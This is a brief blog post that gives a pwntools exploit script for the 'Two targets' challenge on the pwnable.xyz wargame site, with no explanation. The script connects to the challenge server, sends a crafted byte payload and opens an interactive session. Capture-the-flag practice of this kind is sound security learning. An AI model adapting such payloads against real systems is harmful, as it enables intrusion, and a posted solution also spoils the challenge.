History view

Pwning in Linux

Exploit - Two targets pwnable.xyz

theFaunia in the wild 2019. 3. 1. 01:17

Exploit

from pwn import *

context.log_level = 'debug'
p = remote("svc.pwnable.xyz",30031)
#p = process('./two_targets')

#gdb.attach(p,'''
#break *0x00400bd1
#continue
#''')

payload = "Did_you_really_miss_the_"+"\xc8"+"T_b"+"\x7f"+"D"+"\x84"+"\xf3"
p.recvuntil("> ")
p.sendline("1")

p.recvuntil("name: ")
p.sendline(payload)

p.recvuntil("> ")
p.sendline("4")
p.recvuntil("> ")
p.interactive()

'Pwning in Linux' 카테고리의 다른 글

Secret Keeper - Pragyan CTF 19  (0) 2019.03.09
Writeup - echo1  (0) 2019.03.01
Exploit - Note pwnable.xyz  (0) 2019.03.01
Exploit - Misalignment pwnable.xyz  (0) 2019.03.01
Exploit - GrownUp pwnable.xyz  (0) 2019.03.01
Comments